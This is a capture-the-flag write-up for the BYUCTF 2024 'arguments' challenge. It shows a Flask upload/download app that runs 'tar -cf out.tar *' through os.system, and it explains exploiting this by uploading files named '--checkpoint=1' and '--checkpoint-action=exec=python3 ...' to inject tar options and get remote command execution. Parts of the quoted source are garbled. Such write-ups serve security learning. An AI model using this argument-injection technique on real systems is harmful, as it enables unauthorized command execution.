BYUCTF 2024 | arguments-writeup
Challenge Description
We are given a website that basically perform 2 tasks:
- Uploading files
- Downloading the tar of all uploaded files
the source code of both these functionalities are as given:
# upload file
@app.route('/api/upload', methods=['POST'])
def upload():
file = request.files.get('file', None)
if file is None:
return 'No file provided', 400
# check for path traversal
if '..' in file.filename or '/' in file.filename:
return 'Invalid file name', 400
# check file size
if len( > 1000:
return 'File too large', 400'uploads/{g.uuid}/{file.filename}')
return 'Success! <script>setTimeout(function() {window.location="/"}, 3000)</script>', 200
# download file
@app.route('/api/download', methods=['GET'])
def download():
def remove_file(response):
os.system(f"rm -rf uploads/{g.uuid}/out.tar")
return response
# make a tar of all files
os.system(f"cd uploads/{g.uuid}/ && tar -cf out.tar *")
# send tar to user
return send_file(f"uploads/{g.uuid}/out.tar", as_attachment=True, download_name='download.tar', mimetype='application/octet-stream')
We tried fuzzing with the filename parameter and zip slips to read server files but with no success. Also, only been able to read server files would have been a waste because we didn’t knew the name of the flag as it was randomized ( in Dockerfile):
RUN mv /flag.txt /flag_$(cat /dev/urandom | tr -dc a-f0-9 | fold -w32 | head -n1)
So what we actually needed was RCE. Learning about various vulnerabilities that could give us RCE, we discovered that the command
os.system(f"cd uploads/{g.uuid}/ && tar -cf out.tar *")
was actually vulnerable to TAR Command Execution
, which could give us RCE.
Upon learning about the TAR Command Execution
, we found out that
By using tar with –checkpoint-action options, a specified action can be used after a checkpoint
Upon looking for payloads, we found this on PayloadOfAllThings:
--checkpoint-action=exec=sh (your exploit code is here)
After that we tried uploading files with these name
--checkpoint-action=exec=python3 -c "import os;x = chr(47);os.system(f'cp {x}flag* .')"
and --checkpoint=1
. It should have basically copied the flag to this current directory when tar *
command is run, but this resulted in internal server error.
The error didn’t occured when we uploaded an arbitriary file before these files. After we hit the download button we recieved only the arbitriary file we uploaded. But after refreshing the page, file listing showed an additional file named flag_89bb6db3a579141b2cd5c7d01fedf863
After downloading the tar again and reading the flag_89bb6db3a579141b2cd5c7d01fedf863
file, we get the flag: